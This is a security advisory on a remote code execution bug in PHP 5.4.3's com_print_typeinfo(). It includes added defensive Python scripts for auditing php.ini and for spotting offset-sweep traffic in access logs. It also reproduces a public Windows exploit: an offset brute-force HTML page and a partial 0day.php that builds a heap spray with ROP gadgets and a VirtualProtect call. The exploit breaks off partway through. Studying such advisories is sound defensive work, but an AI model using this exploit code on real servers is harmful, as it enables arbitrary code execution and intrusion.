PHP 'com_print_typeinfo()' Remote Code Execution Vulnerability

Published: 2012-05-11
Updated: 2012-05-23

Affected systems:
PHP 5.4.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53621

PHP is an HTML-embedded scripting language. Much like Microsoft's ASP, it is executed on the server side from within HTML documents; its syntax resembles C, and it is widely used by web developers.

The implementation of the com_print_typeinfo function in PHP 5.4.3 contains a remotely exploitable flaw. When the PHP engine executes malicious code carrying shellcode (for example, a shell bound to a port), a remote attacker can exploit it to execute arbitrary code on the affected web server.
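The exposure described above depends on the COM extension being loaded and the function being callable. The following is an added configuration audit, not part of this advisory or of PHP: it parses a php.ini and reports the conditions under which com_print_typeinfo() is reachable. It assumes php.ini's ';' comment syntax, an "extension=" line naming com_dotnet for the COM extension, and disable_functions as the blocking mechanism; the WEAK_INI and HARDENED_INI texts are constructed samples.

```python
"""Added example: audit a php.ini for the settings that expose com_print_typeinfo().

Assumptions (not from the advisory): php.ini uses ';' for comments, the COM
extension is loaded with an "extension=" line naming com_dotnet, and
com_print_typeinfo() can be blocked through disable_functions.
"""


def parse_php_ini(text):
    """Return (enabled_extensions, disabled_functions) parsed from php.ini text.

    Comments start with ';' (values containing ';' must be quoted in php.ini,
    which this minimal parser does not handle); keys are case-insensitive.
    """
    extensions = set()
    disabled = set()
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # drop comments and whitespace
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip("\"'")
        if key.lower() == "extension":
            extensions.add(value.lower())
        elif key.lower() == "disable_functions":
            disabled.update(f.strip().lower() for f in value.split(",") if f.strip())
    return extensions, disabled


def audit_com_typeinfo(ini_text, php_version):
    """List the conditions under which the advisory's bug is reachable."""
    extensions, disabled = parse_php_ini(ini_text)
    findings = []
    if any("com_dotnet" in ext for ext in extensions):
        findings.append("COM extension (com_dotnet) is loaded")
        if "com_print_typeinfo" not in disabled:
            findings.append("com_print_typeinfo is not listed in disable_functions")
    if php_version == "5.4.3":
        findings.append("PHP 5.4.3 is the release named in this advisory")
    return findings


# Constructed sample configurations: the exposed setting beside the hardened one.
WEAK_INI = """
; Windows build with the COM extension enabled and nothing disabled
extension=php_com_dotnet.dll
disable_functions =
"""

HARDENED_INI = """
; COM extension commented out, and the function blocked anyway
;extension=php_com_dotnet.dll
disable_functions = "exec, passthru, com_print_typeinfo"
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_com_typeinfo(ini, "5.4.3") or ["no findings"])
```

Run it against the real php.ini (and the version string from `php -v`) to get a per-host list of findings; an empty list means the function is unreachable through this extension on that host.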

<*Source: 0in (0in.email@gmail.com)
          condis

  Link: ?storyid=13255
*>

Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

0in (0in.email@gmail.com) provided the following test method:

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)


===================
offset-brute.html
===================

<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log"></textarea>
</center>
<script>
// Busy-wait for roughly the given number of milliseconds.
function sleep(milliseconds) {
  var start = new Date().getTime();
  for (var i = 0; i < 1e7; i++) {
    if ((new Date().getTime() - start) > milliseconds){
      break;
    }
  }
}
// Fire an asynchronous GET to url; the response is never inspected.
function makeRequest(url)
{
    var xmlhttp = null;
    if (window.XMLHttpRequest) {
        xmlhttp = new XMLHttpRequest();
        if (xmlhttp.overrideMimeType) {
            xmlhttp.overrideMimeType('text/xml');
        }
    } else if (window.ActiveXObject) {
        // IE
        try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
        catch (e) {
            try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch (e) {}
        }
    }

    if (!xmlhttp) {
        alert('Giving up :( Cannot create an XMLHTTP instance');
        return false;
    }

    xmlhttp.open("GET",url,true);
    xmlhttp.send(null);
    return true;
}
// Walk the candidate offsets, logging each attempt to the textarea.
var log = document.getElementById("log");
for (var offset = 0; offset < 300; offset++)
{
    log.value += "Trying offset:" + offset + "\r\n";
    makeRequest("0day.php?offset=" + offset);
    sleep(500);
}

</script></body></html>
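The page above leaves a distinctive footprint in the web server's access log: one client hitting the same script hundreds of times with a query parameter that counts upward, half a second apart. The following is an added detection example, not part of this advisory: it parses Apache/nginx "combined" log lines and flags any client that sweeps an integer parameter against one path. The log format is an assumption, and the addresses, script name and timestamps in SAMPLE_LOG are constructed for the demonstration.

```python
"""Added example: flag clients sweeping a numeric query parameter against one
script, the access-log footprint of the offset brute-force page above.

Assumptions (not from the advisory): the web server writes the Apache/nginx
"combined" log format; the script name and client addresses in SAMPLE_LOG are
constructed for this demonstration.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into ip, timestamp, path, status, query."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    target = urlsplit(m.group("target"))
    query = {k: v[0] for k, v in parse_qs(target.query).items()}
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "path": target.path,
        "status": int(m.group("status")),
        "query": query,
    }


def find_parameter_sweeps(lines, min_requests=20, window_seconds=60):
    """Return (ip, path, param, count) for every client that hit one path with
    an integer query parameter that strictly increases across at least
    min_requests requests, all inside window_seconds."""
    series = defaultdict(list)  # (ip, path, param) -> [(timestamp, value)]
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param, value in rec["query"].items():
            if value.lstrip("-").isdigit():
                series[(rec["ip"], rec["path"], param)].append((rec["ts"], int(value)))

    hits = []
    for (ip, path, param), points in series.items():
        if len(points) < min_requests:
            continue
        points.sort()
        values = [v for _, v in points]
        span = (points[-1][0] - points[0][0]).total_seconds()
        increasing = all(b > a for a, b in zip(values, values[1:]))
        if increasing and span <= window_seconds:
            hits.append((ip, path, param, len(points)))
    return hits


# Constructed sample log: one client walks offset=0..24 one second apart,
# two other clients browse normally.
SAMPLE_LOG = [
    f'203.0.113.5 - - [11/May/2012:10:00:{i:02d} +0000] '
    f'"GET /0day.php?offset={i} HTTP/1.1" 200 12'
    for i in range(25)
] + [
    '198.51.100.7 - - [11/May/2012:10:00:03 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/May/2012:10:00:09 +0000] "GET /index.php?page=3 HTTP/1.1" 200 5100',
    '198.51.100.9 - - [11/May/2012:10:01:00 +0000] "POST /login.php HTTP/1.1" 302 0',
    '198.51.100.9 - - [11/May/2012:10:01:01 +0000] "GET /0day.php?offset=3 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, path, param, count in find_parameter_sweeps(SAMPLE_LOG):
        print(f"{ip} swept {param}= on {path} across {count} requests")
```

The thresholds are deliberately loose: the page above sends 300 requests in about 150 seconds, so a 20-request, 60-second window catches it early while leaving ordinary pagination (a handful of increasing page= values) below the bar. A run of 5xx responses from the swept script is a second, independent signal worth correlating, since each wrong offset is expected to crash the PHP process.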

===================
     0day.php
===================

<?php

$spray = str_repeat("\x90",0x200);
$offset=$_GET['offset'];
// 775DF0Da   # ADD ESP,10 # RETN    ** [ole32.dll]
$spray = substr_replace($spray, "\xda\xf0\x5d\x77", (strlen($spray))*-1,(strlen($spray))*-1);
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1);

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN   [ole32.dll]
$spray = substr_replace($spray, "\x9f\xae\x52\x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1);

// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "\xd4\x1a\x80\x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);

//  LPVOID lpAddress  = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize  = 0x01000000
$spray = substr_replace($spray, "\x00\x00\x10\x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect =  PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0
$spray = substr_replace($spray, "\x40\x00\x00\x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out  PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);
